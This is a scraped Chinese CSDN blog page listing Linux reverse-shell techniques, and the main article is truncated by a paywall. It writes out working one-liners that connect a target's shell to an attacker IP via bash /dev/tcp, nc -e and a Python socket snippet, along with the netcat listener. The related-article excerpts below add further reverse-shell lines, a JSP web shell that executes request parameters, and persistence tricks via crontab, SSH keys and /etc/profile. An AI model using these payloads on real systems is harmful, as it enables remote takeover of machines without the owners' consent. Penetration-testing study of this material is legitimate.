linux的几种shell反弹

最新推荐文章于 2024-05-26 22:29:50 发布
最新推荐文章于 2024-05-26 22:29:50 发布
阅读量103 收藏
点赞数
文章标签: linux 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64343941/article/details/121566727
版权
本文介绍了在Linux环境中,包括bash、nc、python、perl、ruby、php和awk在内的多种shell反弹技术。通过监听端口并连接到指定IP,实现远程控制。每种方法都需要特定的环境配置,并且在没有输入框的情况下,已成功实现shell反弹。
摘要由CSDN通过智能技术生成

一、

basn反弹

开启监听端口,被攻击者ip为攻击者的。kali为攻击者。

nc -lvvp 10000               

bash -i >& /dev/tcp/192.168.96.133/10000 0>&1

 

 

 nc反弹

nc -e /bin/bash 192.168.96.133 10000

虽然没有输入框,但其实已经反弹成功,

 

 python反弹,需要有python环境。

nc -lvvp 10000            //攻击机

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_

最低0.47元/天 解锁文章
m0_64343941
关注
Linux反弹shell
谢公子的博客
11-29 9395
目录 Bash反弹shell Python反弹shell 其他命令反弹shell 写入命令到定时任务文件 写入SSH公钥 写入/etc/profile文件 当我们可以在远程Linux主机上执行任意命令或写入任意数据到任意文件的时候,我们通常会通过以下方式控制远程主机。 Bash反弹shell Linux 反弹 shell 使用下面这条命令,该命令弹回来的shell是不可交互的,...
Linux几种反弹Shell方法的总结与理解
墨痕诉清风的博客
01-09 2496
实验环境 CentOS 6.5:192.168.0.3 kali2.0:192.168.0.4 方法1: 反弹shell命令如下: bash -i >& /dev/tcp/ip/port 0>&1 首先,使用nc在kali上监听端口: nc -lvp 7777 然后在CentOS6.5下输入: bash -i >& /de...
linux 渗透 密码,linux渗透中常用命令+Tip
weixin_42128141的博客
05-03 207
1.bashattacker 监听nc -lvvp 4444victim 运行bash -i >& /dev/tcp//4444 0>&12. pythonattacker 监听nc -lvvp 4444victim 运行python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,sock...
linux反弹shell几种方式
Ping_Pig的博客
10-24 496
实验环境: 两台kali 方法一: bash -i >& /dev/tcp/ip/port 0>&1 nc -lvvp port 方法二 python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192...
【安全知识】——LInuxshell反弹姿势合集(更新中)
Demo不是emo的博客
05-17 6218
当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash来反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句来达到我们的目的。
反弹shell
soldi_er的博客
04-16 3487
文章目录反向连接的概念反向连接命令命令分析Linux符号知识本地测试实战记录参考 反向连接的概念   反弹shell,是指目标向服务器端口发起请求,发送目标shell命令行的输入输出,服务器通过监听端口来获得请求内容。reverse shell与telnet、ssh等标准shell对应,本质上是网络概念的客户端/服务端的角色反转。   为什么不正向连接?通常用于连接目标机器防火墙受限、权限不足、端口被占用等情形。正向连接,包括远程桌面、Web服务、ssh、Telnet等。 反向连接命令 命令分析   示例
mysql 反弹shell_Linux几种反弹Shell方法的总结与理解
weixin_39929465的博客
01-27 1409
*本文原创作者:LlawLiet,本文属FreeBuf原创奖励计划,未经许可禁止转载。之前在网上看到很多师傅们总结的linux反弹shell的一些方法,为了更熟练的去运用这些技术,于是自己花精力查了很多资料去理解这些命令的含义,将研究的成果记录在这里,所谓的反弹shell,指的是我们在自己的机器上开启监听,然后在被攻击者的机器上发送连接请求去连接我们的机器,将被攻击者的shell反弹到我们的机器上...
经验分享 | 常用linux反弹shell合集
Uguardsec的博客
01-25 962
一、前言 当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash来反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句 来达到我们的目的。 二、反弹方法 攻击机:192.168.3.43 靶机:192.168.1.21 、192.168.249.12 1. Bash反弹 1.1 方法一 攻击者主机上执行监听: nc -lvvp port 目标主机上执行: bash -i >& /dev/tcp/x.x.x.x/port 0
反弹shell原理与实现
悦分享
08-02 3357
反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。...
浅谈反弹shell
weixin_53284312的博客
01-12 2499
反弹shell
反弹Shell总结
code_lab
09-05 778
jsp shell<%@ page import="java.io.*" %> <% try { String cmd = request.getParameter("shell"); //获取参数 Process child = Runtime.getRuntime().exec(cmd); InputStream in = child.getInputStre
【转】反弹Shell,看这一篇就够了
热门推荐
mastergu2的博客
10-26 2万+
前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。 反向连接 那么为什么要用反弹shell
网络安全-反弹shell详解(攻击,检测与防御)
2401_84466336的博客
04-23 4599
1.1 什么是 ShellShell 在计算机系统中指的是一个用户界面,用于访问操作系统的服务。在网络安全中,攻击者常利用 Shell 来控制受害者的系统。1.2 反弹 Shell 的工作原理反弹 Shell 的基本原理是:攻击者在其自己的机器上设置监听端口,然后诱使受害者的机器执行一个反向连接的 Shell 命令,连接回攻击者的机器。这样,攻击者就能通过这个反向连接执行命令,控制受害者的计算机。
反弹shell详细易懂讲解,看这一篇就够了
最新发布
LCW991207的博客
05-26 1727
bash就是shell的众多小弟中的一个,Shell 是操作系统中提供用户与内核之间交互的一种界面,一个 解释型的程序设计语言,它的小弟有很多,它既可以是图形用户界面(GUI),也可以是命令行界面(CLI)。Shell 主要用于接受用户输入的命令并将其传递给操作系统的内核执行,同时将内核的输出结果返回给用户。
反弹shell汇总(超详细)
qq_52173020的博客
05-27 9160
反弹shell姿势大全,看这一篇就够啦~
什么是反弹 Shell
sixqingfeng的博客
07-12 825
前段时间被一位产品经理嘲笑了,说我居然连反弹 Shell 都不知道说实话当时我还真不知道,但这口气咽不下去啊,得赶紧学来看看,这不,我已经学会了学完之后我特地来记录下,同时分享给大家,以后产品经理再也不敢嘲笑我们不懂反弹 Shell 了我们都知道 Shell 的概念吧,简单来说,Shell 就是实现用户命令的接口,通过这个接口我们就能实现对计算机的控制,比如我们常见的 ssh 就是执行的 Shell 命令实现对远程对服务器的控制那反弹 Shell 是啥呢?其英文名叫做 Reverse Shell,具体干什么
各种shell反弹方法
weixin_46626737的博客
05-16 2725
s.connect(("攻击ip",port));再在目标机器执行bash -i > &/dev/tcp/攻击ip/端口 0>&1。post方式,ip=?2.使用nc进行反弹shell。6.使用php反弹shell
深度解析:Linux反弹shell的分类与本质
"不一样的视角剖析Linux 反弹shell水印版.pdf" 本文深入探讨了Linux环境下的反弹shell,从一个新的视角进行分类和解析,旨在揭示更多技术细节。作者指出,传统的反弹shell分类通常只分为交互式和非交互式,但这种...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值